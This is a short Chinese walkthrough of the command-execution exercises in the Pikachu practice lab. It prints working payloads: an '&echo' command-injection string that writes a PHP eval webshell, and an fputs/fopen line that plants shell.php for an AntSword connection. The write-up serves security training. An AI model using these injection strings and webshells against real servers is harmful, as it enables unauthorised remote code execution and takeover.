Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
会飞的大可40 分钟前
Docker 企业级镜像构建与安全实践
安全·docker·容器
忘了ʷºᵇₐ5 小时前
在IDEA 2024.1版本中如何打开Remote Host及连接linux
linux·运维·服务器
upp9 小时前
[最新版本centos 10系统制作与安装]
linux·运维·centos
一战成名99610 小时前
ToDesk全球节点 vs TeamViewer、AnyDesk延迟与稳定性对比
运维·服务器·teamviewer
木斯佳11 小时前
HarmonyOS 6实战:AI时代的“信任危机“,如何处理应用的请求拦截与安全防护
人工智能·安全·harmonyos
桌面运维家11 小时前
VHD/VHDX 数据守护:BAT位图校验与修复
linux·服务器·网络
C++ 老炮儿的技术栈11 小时前
分享一个安全的CString
c语言·c++·windows·git·安全·visual studio
pupudawang11 小时前
Linux下安装Nginx服务及systemctl方式管理nginx详情
linux·运维·nginx
ipad协议开发11 小时前
视频号直播间全功能自动化场控插件开发指南:基于 API 调用的全链路拆解
运维·微信·自动化·视频·ipad
维度攻城狮11 小时前
Docker优雅地运行OpenClaw
运维·docker·容器·openclaw·openclaw安装